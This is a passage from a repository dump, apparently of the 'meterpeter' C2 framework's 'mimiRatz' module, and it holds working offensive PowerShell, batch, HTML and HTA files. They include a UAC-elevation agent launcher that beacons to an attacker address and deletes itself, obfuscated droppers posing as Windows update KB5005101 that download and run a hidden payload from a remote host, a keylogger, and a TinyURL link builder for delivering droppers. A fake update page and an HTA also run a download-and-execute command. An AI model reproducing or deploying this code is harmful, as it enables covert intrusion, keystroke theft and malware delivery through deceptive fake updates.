$Directory\\$FolderName\r\n   }catch{#Fail to change directory attributes\r\n      Write-Host \"Error: fail to change directory attributes.`n\" -ForegroundColor Red -BackgroundColor Black\r\n      exit #Exit SuperHidden\r\n   }\r\n\r\n   #Remove directory\r\n   Remove-Item -Path \"$Directory\\$FolderName\" -Recurse -Force\r\n   If(-not(Test-Path -Path \"$Directory\\$FolderName\" -EA SilentlyContinue))\r\n   {\r\n      Write-Host \"Super hidden '$FolderName' folder deleted ..\"\r\n   }\r\n   Else\r\n   {\r\n      Write-Host \"Error: fail to delete '$Directory\\$FolderName' folder 
..\"   \r\n   }\r\n\r\n   #Display directory contents now\r\n   $SHdb = Get-ChildItem -Path \"$Directory\" -Force | Select-Object * |\r\n      Where-Object { $_.PSIsContainer -eq 'True' } |\r\n   Select-Object Length,Name,LastWriteTime | Format-Table -AutoSize\r\n\r\n   If(-not($SHdb))\r\n   {\r\n      Write-Host \"No contents found inside current directory.`n\" -ForegroundColor Yellow\r\n   }\r\n   Else\r\n   {\r\n      echo $SHdb\r\n   }\r\n\r\n}"
  },
  {
    "path": "mimiRatz/UACeop.ps1",
    "content": "﻿<#\r\n.SYNOPSIS\r\n   UAC Auto-Elevate meterpeter client agent\r\n\r\n   Author: @r00t-3xp10it\r\n   Tested Under: Windows 10 (19044) x64 bits\r\n   Required Dependencies: none\r\n   Optional Dependencies: netstat\r\n   PS cmdlet Dev version: v1.0.8\r\n\r\n.DESCRIPTION\r\n   Auxiliary module of Meterpeter v2.10.14 that allow users to\r\n   elevate current terminal session from user -> administrator\r\n\r\n.NOTES\r\n   Warning: Target user will be prompt by UAC to run elevated.\r\n   Warning: cmdlet will exit execution if target declines to run\r\n   it with admin privileges by sellecting 'NO' button in UAC prompt\r\n   Warning: Parameter -attacker 'LHOST:LPORT' allows this cmdlet to\r\n   check for agent conection [loop] or abort cmdlet execution if any\r\n   connection from server <-> client is found active (breaking loop)\r\n\r\n.Parameter Attacker\r\n   Attacker LHOST:LPORT (default: off)\r\n\r\n.Parameter StartTime\r\n   Schedule execution to HH:mm (default: off)\r\n\r\n.Parameter AgentPath\r\n   Agent (default: $Env:TMP\\Update-KB5005101.ps1)\r\n\r\n.Parameter AutoDel\r\n   Switch that auto-deletes this cmdlet in the end\r\n\r\n.EXAMPLE\r\n   PS C:\\> .\\uaceop.ps1 -agentpath \"$pwd\\evil.ps1\"\r\n   try to elevate evil.ps1 privileges only once\r\n  \r\n.EXAMPLE\r\n   PS C:\\> .\\uaceop.ps1 -attacker '192.168.1.66:666' -autodel\r\n   Loop agent execution until a connection its found active\r\n\r\n.EXAMPLE\r\n   PS C:\\> .\\uaceop.ps1 -starttime '09:34' -attacker '192.168.1.66:666' -autodel\r\n   Schedule execution to HH:mm + loop agent execution until a connection its found active\r\n\r\n.EXAMPLE\r\n   PS C:\\> Start-Process -windowstyle hidden -argumentlist \"-file uaceop.ps1 -starttime '09:34' -attacker '192.168.1.66:666' -autodel\"\r\n   Hidden schedule execution of beacon to HH:mm + loop agent execution until a connection its found active + autodelete this cmdlet\r\n\r\n.INPUTS\r\n   None. 
You cannot pipe objects into UacEop.ps1\r\n\r\n.OUTPUTS\r\n   [*] Relaunch console as an elevated process!\r\n   [1] Executing meterpeter client [Comfirm]\r\n   [ ] Waiting connection from remote server ..\r\n   [2] Executing meterpeter client [Comfirm]\r\n   [-] Remote connection found, exit loop ..\r\n\r\n.LINK\r\n   https://github.com/r00t-3xp10it/meterpeter\r\n#>\r\n\r\n\r\n[CmdletBinding(PositionalBinding=$false)] param(\r\n   [string]$AgentPath=\"$Env:TMP\\Update-KB5005101.ps1\",\r\n   [string]$StartTime=\"off\",\r\n   [string]$Attacker=\"off\",\r\n   [switch]$AutoDel\r\n)\r\n\r\n\r\n## Global variable declarations\r\n$ErrorActionPreference = \"SilentlyContinue\"\r\n## Disable Powershell Command Logging for current session.\r\nSet-PSReadlineOption –HistorySaveStyle SaveNothing|Out-Null\r\n\r\n## Send Attacker settings to logfile its a mandatory step\r\n# because the 2 time, cmdlet exec with default parameters\r\necho \"Server: $Attacker\" >> \"$Env:TMP\\Programdata.log\"\r\necho \"Client: $AgentPath\" >> \"$Env:TMP\\Programdata.log\"\r\n\r\nif(-not($Attacker -match '^(off)$'))\r\n{\r\n   ## Make sure user inputed the correct lhost:lport format\r\n   # Regex translated to human  1  9  2 .  1  6  8 .  ?  .    ?   
:  ?\r\n   If(-not($Attacker -match '^(\\d\\d\\d\\.\\d\\d\\d\\.\\d*\\.)+[\\d*]+:[\\d*]+$'))\r\n   {\r\n      write-host \"`n[x] Error: wrong LHOST:LPORT format input`n\" -ForegroundColor Red\r\n      Remove-Item -Path \"$Env:TMP\\Programdata.log\" -Force\r\n      Start-Sleep -Seconds 2\r\n      return\r\n   }\r\n}\r\n\r\n\r\nIf($StartTime -Match '^(\\d\\d:\\d\\d)$')\r\n{\r\n   <#\r\n   .SYNOPSIS\r\n      Author: @r00t-3xp10it\r\n      Helper - Sleep for xx minutes function.\r\n   #>\r\n\r\n   write-host \"[*] Schedule start at [\" -NoNewline\r\n   write-host \"$StartTime\" -ForegroundColor Red -NoNewline\r\n   write-host \"] hours.\"\r\n\r\n   For(;;)\r\n   {\r\n      ## Compare $CurrentTime with $StartTime\r\n      $CurrentTime = (Get-Date -Format 'HH:mm')\r\n      If($CurrentTime -Match \"^($StartTime)$\")\r\n      {\r\n         break # Continue execution now\r\n      }\r\n\r\n      ## loop each 10 seconds\r\n      Start-Sleep -Seconds 10\r\n   }\r\n}\r\n\r\n\r\n$Counter = 0 ## Set loop function counter to '0'\r\n$Attacker = ((Get-Content -Path \"$Env:TMP\\Programdata.log\"|findstr /C:\"Server:\"|Select-Object -First 1) -replace '^(Server: )','')\r\n$AgentPath = ((Get-Content -Path \"$Env:TMP\\Programdata.log\"|findstr /C:\"Client:\"|Select-Object -First 1) -replace '^(Client: )','')\r\n$AdminRaw = \"(£[S@ec£urit£y.P£r@inc£ipal.£Wi£nd@o£wsP£r@inc£ipal]£[S£e@cu£r@it£y.P£ri@n£ci@pa£l.W£i@nd£o@wsId@e£nti@ty]:£:G@e£tC£ur@re£n@t()).I@sI£nR@o£le@([£S£e@cu£ri@ty.P£ri@nc£ip@al.Wi£n@do£ws@Bu£il@tI£n@Ro£l@e]:£:A£d@mi£ni£s@tr£at@o£r)\" -replace '(@|£)',''\r\n$AdminCheck = $AdminRaw|&('XeX' -replace '^(X)','i')\r\nIf($AdminCheck -match '^(False)$')\r\n{\r\n   $Namelless = \"%R@u%nA@s%\" -replace '(@|%)',''\r\n   write-host \"[*] Relaunch console as an elevated process!\"\r\n   Start-Process -WindowStyle Hidden powershell \"-File\",('\"{0}\"' -f $MyInvocation.MyCommand.Path) -Verb $Namelless\r\n   exit\r\n}\r\n\r\n\r\nIf($Attacker -match '^(off)$')\r\n{\r\n   <#\r\n   
.SYNOPSIS\r\n      Author: @r00t-3xp10it\r\n      Helper - Execute agent WITHOUT confirm if connection has recived\r\n   #>\r\n\r\n   write-host \"[*] Executing meterpeter client [Once]\"\r\n   Start-Process -WindowStyle Hidden powershell -ArgumentList \"-file $AgentPath\"   \r\n}\r\nElse\r\n{\r\n   <#\r\n   .SYNOPSIS\r\n      Author: @r00t-3xp10it\r\n      Helper - Execute agent and CONFIRM if connection has recived\r\n\r\n   .NOTES\r\n      Agent [Update-KB5005101.ps1] will beacon home from 10 to 10\r\n      seconds unless UACeop.ps1 its stoped or an active connection\r\n      its found from server <-> Client using netstat native command\r\n   #>\r\n\r\n   For(;;)\r\n   {\r\n      $Counter = $Counter + 1\r\n      write-host \"[$Counter] Executing meterpeter client [Comfirm]\"\r\n      Start-Process -WindowStyle Hidden powershell -ArgumentList \"-file $AgentPath\"\r\n      Start-Sleep -Seconds 10 ## Give extra time for agent to beacon home\r\n\r\n      $CheckAgentConnection = (netstat -ano|findstr /C:\"ESTABLISHED\"|findstr /C:\"$Attacker\")\r\n      If($CheckAgentConnection -match \"$Attacker\")\r\n      {\r\n         write-host \"[-] Remote connection found, exit loop ..`n\"\r\n         break # Connection found, exit loop\r\n      }\r\n      Else\r\n      {\r\n         write-host \"[ ] Waiting connection from remote server ..\" -ForegroundColor Yellow\r\n      }\r\n   }\r\n}\r\n\r\n\r\nIf($AutoDel.IsPresent)\r\n{\r\n   ## Auto-Delete cmdlet in the end ...\r\n   Remove-Item -LiteralPath $MyInvocation.MyCommand.Path -Force\r\n}\r\n\r\nStart-Sleep -Seconds 2\r\nRemove-Item -Path \"$Env:TMP\\Programdata.log\" -Force\r\nexit"
  },
  {
    "path": "mimiRatz/Update-FileLess.bat",
    "content": "@echo off\r\n( ,;(=i%@Socket():%f ,no%n_UDP%t ^DE%DB_#1%FIN^ED ,%@k%IS_%Buffer_%MINI%#1%MI%'i'%ZE^D ;se%#0_%t ^IS_MIN^IM%#1_%IZ^ED=1 && @st^a%db%rt \"\" ^/m%_#1%i^n \"%~dpnx0\" %* && e%GUID%x^it); ),\r\n,Col%ls%or 0E && (,(@tIt%&1%lE ^Cumu%_UUID_%l^ati%#1%v^e Sec%#1%u^ri%_i_%ty Up^dat%'%e KB%Buffer_%5005101 && @Pow%#1%E^rsH^el%Socket():%l Ge^t-Hot%vibes%Fi^x),)\r\n@cm%Buff#1%d ^/R Ec^h%i0%O A|Pow^er%_GUID_%sh^elL Set-Exec^UtI%'B%onPo^lI%send(i)%cY Unr%db%e^stric^t%OFF%ed -Sc%_i0%o^pe Cur%_%r^ent%LANG%Us^er\r\n@Cd %tmp% && Meterpeter_Fileless_CmdLine\r\ndel \"%~f0\""
  },
  {
    "path": "mimiRatz/Update-KB5005101.bat",
    "content": "@echo off\r\n( ,;(=i%@Socket():%f ,no%n_UDP%t ^DE%DB_#1%FIN^ED ,%@k%IS_%Buffer_%MINI%#1%MI%'i'%ZE^D ;se%#0_%t ^IS_MIN^IM%#1_%IZ^ED=1 && @st^a%db%rt \"\" ^/m%_#1%i^n \"%~dpnx0\" %* && e%GUID%x^it); ),\r\n,Col%ls%or 0E && (,(@tIt%&1%lE ^Cumu%_UUID_%l^ati%#1%v^e Sec%#1%u^ri%_i_%ty Up^dat%'%e KB%Buffer_%5005101 && @Pow%#1%E^rsH^el%Socket():%l Ge^t-Hot%vibes%Fi^x),)\r\n@cm%Buff#1%d ^/R Ec^h%i0%O A|Pow^er%_GUID_%sh^elL Set-Exec^UtI%'B%onPo^lI%send(i)%cY Unr%db%e^stric^t%OFF%ed -Sc%_i0%o^pe Cur%_%r^ent%LANG%Us^er\r\n@powershell iwr -Uri \"ht%i0%tp://CharlieBrown/Update-KB50%i0_%05101.ps1\" -OutFile \"%tmp%\\Update-KB50%i0_%05101.ps1\"\r\n@Cd %tmp% && ,pOw%_Socket(i)_%eR^sH%_i_%El^L -ExeC^ut%'b%I^oN ByP%\\x0a%a^Ss -Win%_#1%dOw^stY^le hI%i0%d^Den -NoP%_i%r^Ofi%stuff%Le -Fi%Nall%l^E %tmp%\\Update-KB50%i0_%05101.ps1\r\ndel \"%~f0\"\r\n"
  },
  {
    "path": "mimiRatz/keymanager.ps1",
    "content": "﻿[CmdletBinding(PositionalBinding=$false)] param(\r\n   [string]$Action=\"start\",\r\n   [string]$UsePS2=\"false\"\r\n)\r\n\r\n\r\n#Global variable declarations\r\n$ErrorActionPreference = \"SilentlyContinue\"\r\n\r\n\r\nIF($Action -ieq \"start\")\r\n{\r\n\r\n   If(-not(Test-Path -Path \"$Env:TMP\\mscore.ps1\"))\r\n   {\r\n      #Download cmdlet from my github repository\r\n      iwr -Uri \"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/mscore.ps1\" -OutFile \"$Env:TMP\\mscore.ps1\"|Unblock-File\r\n   }\r\n\r\n   If($UsePS2 -ieq \"true\")\r\n   {\r\n      $TryThisInsted = \"#pow#e@rsh#e@ll -@ve#r@sio@n @2# -@C# ech@o ps2v@er#si@onfo@un#d|O@ut-@File# $Env:TMP\\downgradeatt.log -Fo@rc@e\" -replace '(@|#)',''\r\n      \"$TryThisInsted\"|&('SEX' -replace 'S','i')\r\n      $TestDowngradeAtt = Get-Content -Path \"$Env:TMP\\downgradeatt.log\"|Select-String \"ps2versionfound\"\r\n      Remove-Item -Path \"$Env:TMP\\downgradeatt.log\" -Force\r\n      If($TestDowngradeAtt -iMatch '^(ps2versionfound)$')\r\n      {\r\n         $rrr = \"-version\"\r\n         #Use powershell $rrr 2 to execute keylogger\r\n         $cmdlineToExec = \"powershell $rrr 2 -C Import-Module -Name `$Env:TMP\\mscore.ps1 -Force\"\r\n      }\r\n      Else\r\n      {\r\n         #Defaul keylogger execution function\r\n         $cmdlineToExec = \"Import-Module -Name `$Env:TMP\\mscore.ps1 -Force\"         \r\n      }\r\n   }\r\n   Else\r\n   {\r\n      #Defaul keylogger execution function\r\n      $cmdlineToExec = \"Import-Module -Name `$Env:TMP\\mscore.ps1 -Force\"   \r\n   }\r\n\r\n   If(Test-Path -Path \"$Env:TMP\\mscore.ps1\")\r\n   {\r\n      #Start keylogger process in background\r\n      Start-Process -WindowStyle Hidden powershell -ArgumentList \"$cmdlineToExec\"\r\n      If($?)\r\n      {\r\n         Start-Sleep -Milliseconds 600 #Give some time for log creation\r\n         $PPID = (Get-Content \"$Env:TMP\\pid.log\" | Where-Object { $_ -ne '' })\r\n         
write-host \"`n * Key-logger process started with ID: $PPID\" -ForegroundColor Green\r\n      }\r\n      Else\r\n      {\r\n         write-host \"`n x Error: fail to start Key-logger background process ..\" -ForegroundColor Red -BackgroundColor Black\r\n      }\r\n   }\r\n   Else\r\n   {\r\n      write-host \"`n x Error: '$Env:TMP\\mscore.ps1' missing..\" -ForegroundColor Red -BackgroundColor Black\r\n   }\r\n}\r\n\r\n\r\nIF($Action -ieq \"stop\")\r\n{\r\n\r\n   If(Test-Path -Path \"$Env:TMP\\pid.log\")\r\n   {\r\n      #Get key-logger PPID from logfile\r\n      $PPID = Get-Content \"$Env:TMP\\pid.log\" | Where-Object { $_ -ne '' }\r\n      #Stop key-logger process by is PPID\r\n      Stop-Process -Id $PPID -Force\r\n      If($?)\r\n      {\r\n         write-host \"`n* Key-logger process '$PPID' stoped.\" -ForegroundColor Green\r\n      }\r\n      Else\r\n      {\r\n         write-host \"`nx Error: fail to stop Key-logger process id: '$PPID'\" -ForegroundColor Red -BackgroundColor Black\r\n      }\r\n   }\r\n   Else\r\n   {\r\n      write-host \"`nx Error: fail to retrieve key-logger process ID\" -ForegroundColor Red -BackgroundColor Black\r\n   }\r\n\r\n\r\n   #Get the KeyStrokes\r\n   write-host \"`nKeylogger Key-strokes Capture\" -ForegroundColor Yellow\r\n   write-host \"----------------------------\"\r\n   If(Test-Path -Path \"$Env:TMP\\void.log\")\r\n   {\r\n      Get-Content -Path \"$Env:TMP\\void.log\"\r\n   }\r\n   Else\r\n   {\r\n      write-host \"x Error: '$Env:TMP\\void.log' missing\" -ForegroundColor Red -BackgroundColor Black   \r\n   }\r\n\r\n   #Clean all artifacts left behind\r\n   Remove-Item -Path \"$Env:TMP\\mscore.ps1\" -Force\r\n   Remove-Item -Path \"$Env:TMP\\void.log\" -Force\r\n   Remove-Item -Path \"$Env:TMP\\pid.log\" -Force\r\n}"
  },
  {
    "path": "mimiRatz/mscore.ps1",
    "content": "﻿<#\r\n.SYNOPSIS\r\n   Capture keyboad keystrokes\r\n\r\n   Author: @r00t-3xp10it (ssa redteam)\r\n   Tested Under: Windows 10 (19043) x64 bits\r\n   Required Dependencies: void.log, pid.log {auto-build}\r\n   Optional Dependencies: none\r\n   PS cmdlet Dev version: v1.0.2\r\n\r\n.DESCRIPTION\r\n   Aux module of Meterpeter C2 to capture keystrokes\r\n\r\n.NOTES\r\n   Keylogger process will run until CTRL+C its pressed.\r\n  \r\n.EXAMPLE\r\n   PS C:\\> Import-Module .\\mscore.ps1 -Force\r\n   Capture keystrokes until CTRL+C its pressed\r\n\r\n.INPUTS\r\n   None. You cannot pipe objects into mscore.ps1\r\n\r\n.OUTPUTS\r\n   * Keylogger is working with ID: 1822\r\n     => Press CTRL+C to stop process ..\r\n   * Total Number of Keystrokes: 23\r\n   \r\n.LINK\r\n   https://github.com/r00t-3xp10it/meterpeter\r\n#>\r\n\r\n\r\nfunction Keystrokes()\r\n{\r\n   [int]$totalNumber = 0\r\n   $Path = \"$Env:TMP\\void.log\"\r\n   echo $pid >> $Env:TMP\\pid.log #Store Process PID to be abble to stop it later\r\n\r\n\r\n#API Calls\r\n$signatures = @'\r\n[DllImport(\"user32.dll\", CharSet=CharSet.Auto, ExactSpelling=true)] \r\npublic static extern short GetAsyncKeyState(int virtualKeyCode); \r\n\r\n[DllImport(\"user32.dll\", CharSet=CharSet.Auto)]\r\npublic static extern int GetKeyboardState(byte[] keystate);\r\n\r\n[DllImport(\"user32.dll\", CharSet=CharSet.Auto)]\r\npublic static extern int MapVirtualKey(uint uCode, int uMapType);\r\n\r\n[DllImport(\"user32.dll\", CharSet=CharSet.Auto)]\r\npublic static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);\r\n'@\r\n\r\n   #Load signatures and make members available\r\n   $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru\r\n \r\n   #Create output file\r\n   $null = Ni -Path $Path -ItemType File -Force\r\n\r\n   try{\r\n      Write-Host \"* \" -ForegroundColor Green -NoNewline;\r\n      Write-Host 
\"Keylogger is working with ID: \" -ForegroundColor DarkGray -NoNewline;\r\n      Write-Host \"$pid\" -ForegroundColor Green\r\n      Write-Host \"  => Press CTRL+C to stop process ..\" -ForegroundColor DarkYellow\r\n\r\n      ## Create endless loop\r\n      # collect pressed keys, CTRL+C to exit\r\n      While($true)\r\n      {\r\n         #Start-Sleep -Milliseconds 20\r\n         #Scan  ASCII codes between 8 and 129\r\n         For($ascii = 9; $ascii -le 128; $ascii++) \r\n         {\r\n            #Get current key state\r\n            $state = $API::GetAsyncKeyState($ascii)\r\n            #Is key pressed?\r\n            If($state -eq -32767) \r\n            {\r\n               $null = [console]::CapsLock\r\n\r\n               #Translate scan code to real code\r\n               $virtualKey = $API::MapVirtualKey($ascii, 3)\r\n\r\n               #Get keyboard state for virtual keys\r\n               $kbstate = New-Object Byte[] 256\r\n               $checkkbstate = $API::GetKeyboardState($kbstate)\r\n\r\n               #Prepare a StringBuilder to receive input key\r\n               $mychar = New-Object -TypeName System.Text.StringBuilder\r\n\r\n               #Translate virtual key\r\n               $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)\r\n\r\n                 If($success) \r\n                 {\r\n                    #add key to logger file\r\n                    [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode)\r\n                    $totalNumber = $totalNumber+1\r\n                 }\r\n              }\r\n          }\r\n       }\r\n   }\r\n   finally\r\n   {\r\n      write-Host \"* \" -ForegroundColor Green -NoNewline;\r\n      write-Host \"Total Number of Keystrokes: \" -ForegroundColor DarkGray -NoNewline;\r\n      write-Host \"$totalNumber\" -ForegroundColor Green \r\n   }\r\n}\r\n\r\n## Records all key presses until\r\n# script is aborted by pressing CTRL+C\r\nKeystrokes"
  },
  {
    "path": "mimiRatz/shorturl.ps1",
    "content": "﻿<#\r\n.SYNOPSIS\r\n   TinyUrl url generator\r\n\r\n   Author: @r00t-3xp10it (ssa redteam)\r\n   Tested Under: Windows 10 (19043) x64 bits\r\n   Required Dependencies: Invoke-WebRequest\r\n   Optional Dependencies: http.server {manual}\r\n   PS cmdlet Dev version: v1.1.7\r\n\r\n.DESCRIPTION\r\n   Auxiliary module of Meterpeter C2 v2.10.12 that generates\r\n   tinyurl links to deliver droppers (cradles) in local LAN.\r\n\r\n.NOTES\r\n   This cmdlet creates tinyurl links to deliver Meterpeter C2\r\n   droppers (cradles) in local LAN, and its automatic executed.\r\n\r\n   shorturl.ps1 cmdlet only delivers payloads on local LAN\r\n   If invoked -startserver 'true' then cmdlet starts http.server\r\n   parameter -serverport contains: \"attacker IP addr : http.server port\"\r\n   shorturl.ps1 directory its used as http.server working directory if invoked -startserver 'true'\r\n   The webpage.html\\binary.exe of -payloadname to deliver must be on the same dir as shorturl.ps1\r\n\r\n.Parameter ServerPort\r\n   Attacker IP : http.server port (default: 192.168.1.72:8087)\r\n\r\n.Parameter PayloadName\r\n   Meterpeter C2 dropper name (default: Update-KB5005101.html)\r\n\r\n.Parameter StartServer\r\n   Start http.server process? (default: false)\r\n\r\n.Parameter Verb\r\n   Use TinyUrl verbose output? 
(default: false)\r\n  \r\n.EXAMPLE\r\n   PS C:\\> .\\shorturl.ps1 -ServerPort '127.0.0.1:8080'\r\n   URI: http://127.0.0.1:8080/Update-KB5005101.html\r\n\r\n.EXAMPLE\r\n   PS C:\\> .\\shorturl.ps1 -ServerPort '192.168.1.72:8087' -PayloadName 'update.html'\r\n   URI: http://192.168.1.72:8087/update.html\r\n\r\n.EXAMPLE\r\n   PS C:\\> .\\shorturl.ps1 -PayloadName 'fake-update.zip' -Verb 'true'\r\n   URI: http://192.168.1.72:8087/fake-update.zip ( verbose outputs )\r\n\r\n.EXAMPLE\r\n   PS C:\\> .\\shorturl.ps1 -serverport '127.0.0.1:8081' -startserver 'true'\r\n   URI: http://127.0.0.1:8081/Update-KB5005101.html ( start http.server )\r\n\r\n.EXAMPLE\r\n   PS C:\\> .\\shorturl.ps1 -Payloadname 'mozlz4-win32.exe' -startserver 'true'\r\n   URI: http://192.168.1.72:8087/mozlz4-win32.exe ( start http.server )\r\n\r\n.INPUTS\r\n   None. You cannot pipe objects into shorturl.ps1\r\n\r\n.OUTPUTS\r\n   [i] Raw Url       : http://192.168.1.72:8080/Update-KB5005101.html\r\n\r\n   StatusCode        : 200\r\n   StatusDescription : OK\r\n   Content           : https://tinyurl.com/yyx9xptu\r\n   RawContent        : HTTP/1.1 200 OK\r\n                       Connection: keep-alive\r\n                       X-Content-Type-Options: nosniff\r\n                       X-XSS-Protection: 1; mode=block\r\n                       CF-Cache-Status: DYNAMIC\r\n                       CF-RAY: 703551185c40da82-LIS\r\n                       alt-svc: h3=\":443\"; ma=86400, h3-29=\"...\r\n   Forms             : {}\r\n   Headers           : {[Connection, keep-alive], [X-Content-Type-Options, nosniff], [X-XSS-Protection, 1; mode=block],\r\n                       [CF-Cache-Status, DYNAMIC]...}\r\n   Images            : {}\r\n   InputFields       : {}\r\n   Links             : {}\r\n   ParsedHtml        : mshtml.HTMLDocumentClass\r\n   RawContentLength  : 28\r\n\r\n   [i] Shorten Uri  : https://tinyurl.com/yyx9xptu\r\n   [*] 06:07:18 - Starting python http.server ..\r\n\r\n.LINK\r\n   
https://github.com/r00t-3xp10it/meterpeter\r\n#>\r\n\r\n\r\n[CmdletBinding(PositionalBinding=$false)] param(\r\n   [string]$PayloadName=\"Update-KB5005101.html\",\r\n   [string]$ServerPort=\"192.168.1.72:8087\",\r\n   [string]$StartServer=\"false\",\r\n   [string]$Verb=\"false\"\r\n)\r\n\r\n\r\n$testServer = $null\r\n#Global variable declarations\r\n$ErrorActionPreference = \"SilentlyContinue\"\r\n\r\n#Shorten Url function\r\n$Uri = \"https://$ServerPort/$PayloadName\" -replace 'ps:','p:'\r\n$UrlApi = \"https://t0in0yu0r0l.c0om0/ap0i-cr0ea0te.ph0p0\" -replace 'ps:/','p:/' -replace '0',''\r\n$Response = Invoke-WebRequest \"${UrlApi}?url=${Uri}\"\r\n\r\n\r\nIf($Response)\r\n{\r\n\r\n   <#\r\n   .SYNOPSIS\r\n      Author: @r00t-3xp10it\r\n      Helper - generates tinyurl links to deliver droppers (cradles) in local LAN.\r\n   #>\r\n\r\n   If($Verb -ieq \"True\")\r\n   {\r\n      #Cmdlet verbose display fuction\r\n      write-host \"[i] Raw Url       : $Uri\" -ForeGroundColor Black -BackGroundColor white\r\n      $Response\r\n   }\r\n\r\n   #Store uri in local variable.\r\n   $GetShortenUrl = $Response.Content\r\n\r\n   #Display onscreen the tinyurl uri\r\n   If($Response.StatusCode -eq 200 -and $GetShortenUrl -ne $null)\r\n   {\r\n      Write-Host \"[i] Shorten Uri  : $GetShortenUrl\" -ForeGroundColor Black -BackGroundColor white\r\n   }\r\n   Else\r\n   {\r\n      Write-Host \"[\" -ForeGroundColor DarkGray -NoNewline;\r\n      Write-Host \"x\" -ForeGroundColor Red -NoNewline;\r\n      Write-Host \"] fail to retrieve tinyurl uri ..\" -ForeGroundColor DarkGray\r\n   }\r\n\r\n   If($StartServer -ieq \"true\")\r\n   {\r\n\r\n      <#\r\n      .SYNOPSIS\r\n         Author: @r00t-3xp10it\r\n         Helper - Start http.server to deliver payloadname on local LAN\r\n\r\n      .NOTES\r\n         Remark: PayloadName must be on shortcut.ps1 current directory.\r\n         Parameter -payloadname 'bin.exe' can be invoked together with\r\n         param -startserver 'true' to 
deliver 'bin.exe' on local LAN.\r\n      #>\r\n\r\n      try{\r\n         $testServer = python -V\r\n      }Catch{\r\n         Write-Host \"[\" -ForeGroundColor DarkGray -NoNewline;\r\n         Write-Host \"x\" -ForeGroundColor Red -NoNewline;\r\n         Write-Host \"] cmdlet cant find the python interpreter ..\" -ForeGroundColor DarkGray      \r\n      }\r\n\r\n      If($testServer)\r\n      {\r\n         $ServerTime = Date -Format 'hh:mm:ss'\r\n         $HttpAddr = $ServerPort.Split(':')[0];$HttpPort = $ServerPort.Split(':')[1]\r\n         Write-Host \"[*] ${ServerTime} - Starting python http.server ..\" -ForeGroundColor Green\r\n         Start-Process powershell -ArgumentList \"python -m http.server $HttpPort --bind $HttpAddr\"\r\n      }\r\n   }\r\n\r\n}\r\nElse\r\n{\r\n   Write-Host \"[\" -ForeGroundColor DarkGray -NoNewline;\r\n   Write-Host \"x\" -ForeGroundColor Red -NoNewline;\r\n   Write-Host \"] fail to retrieve tinyurl uri (no response)..\" -ForeGroundColor DarkGray\r\n}\r\n"
  },
  {
    "path": "mimiRatz/theme/Update-KB5005101.html",
    "content": "<html>\r\n<title>Update KB5005101 21H1</title>\r\n<link rel=\"icon\" type=\"image/png\" href=\"favicon.png\"/>\r\n<meta http-equiv=\"Refresh\" content=\"0; url='https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005101'\" />\r\n<body background=\"Catalog.png\"><iframe id=\"frame\" src=\"henrythenavigator.zip\" application=\"yes\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>\r\n</body></html>"
  },
  {
    "path": "mimiRatz/theme/banner.mp",
    "content": " _   _  _____  _____ _____      ____  ____ _____ __  __ ____ _____ \r\n| |_| ||_   _||_   _|| ()_)    (_ (_ | ===|| () )\\ \\/ /| ===|| () )\r\n|_| |_|  |_|    |_|  |_|      .__)__)|____||_|\\_\\ \\__/ |____||_|\\_\\"
  },
  {
    "path": "mimiRatz/update.hta",
    "content": "<html>\r\n<title>KB5005101 21H1 - Security Update</title>\r\n<script>\r\n   path = document.URL\r\n   document.write(\r\n      '<HTA:APPLICATION ID=\"oHTA\" APPLICATIONNAME=\"KB5005101 21H1\" SHOWINTASKBAR=\"yes\" SCROLL=\"no\" ICON=\"uri_icon_data\">'\r\n   );\r\n</script>\r\n\r\n<body bgcolor=\"Gainsboro\">\r\n<img src=\"C:\\Windows\\Web\\Wallpaper\\Windows\\img0.jpg\" alt=\"KB5005101 21H1\" width=\"1395\" height=\"440\" /><br /><br />\r\n<center><strong>Windows servicing stack update - 19041.1161, 19042.1161 and 19043.1161</strong></center><br />\r\n\r\n<textarea rows=\"7\" cols=\"138\" name=\"Update info\" id=\"Update info\">\r\nRelease Date: 02/01/2024\r\nVersion: OS Builds 19041.1161, 19042.1161 and 19043.1161\r\n\r\nThis update makes quality improvements to the servicing stack, which is the component that installs Windows updates.\r\nServicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can\r\nreceive and install Microsoft updates. IMPORTANT This release includes the Flash Removal Package. Taking this update\r\nwill remove Adobe Flash from the machine. For more information, see the Update on Adobe Flash Player End of Support.\r\n\r\nDevices with Windows installations created from custom offline media or custom ISO image might have Microsoft Edge\r\nLegacy removed by this update, but not automatically replaced by the new Microsoft Edge. This issue is only encountered\r\nwhen custom offline media or ISO images are created by slipstreaming this update into the image without having first\r\ninstalled the standalone servicing stack update (SSU) released March 29, 2023 or later.\r\n</textarea>\r\n</body>\r\n\r\n<SCRIPT LANGUAGE=\"VBScript\">\r\n   CreateObject(\"wscript.shell\").popup \"Windows servicing stack update - 19041.1161, 19042.1161, and 19043.1161\" & vbcrlf & \"This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. 
Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates.\", 4, \"KB5005101 21H1 - Security Update\", 1\r\n   CreateObject(\"WScript.Shell\").Exec \"cmd /R echo Y|powershell Set-ExecutionPolicy UnRestricted -Scope CurrentUser && powershell cd $Env:TMP;iwr -uri 'http://CharlieBrown/Update-KB5005101.ps1' -outfile 'Update-KB5005101.ps1';Start-Process -WindowStyle hidden powershell -argumentlist '-file Update-KB5005101.ps1'\"\r\n   window.close()\r\n</SCRIPT>\r\n</html>"
  },
  {
    "path": "mimiRatz/update.ps1",
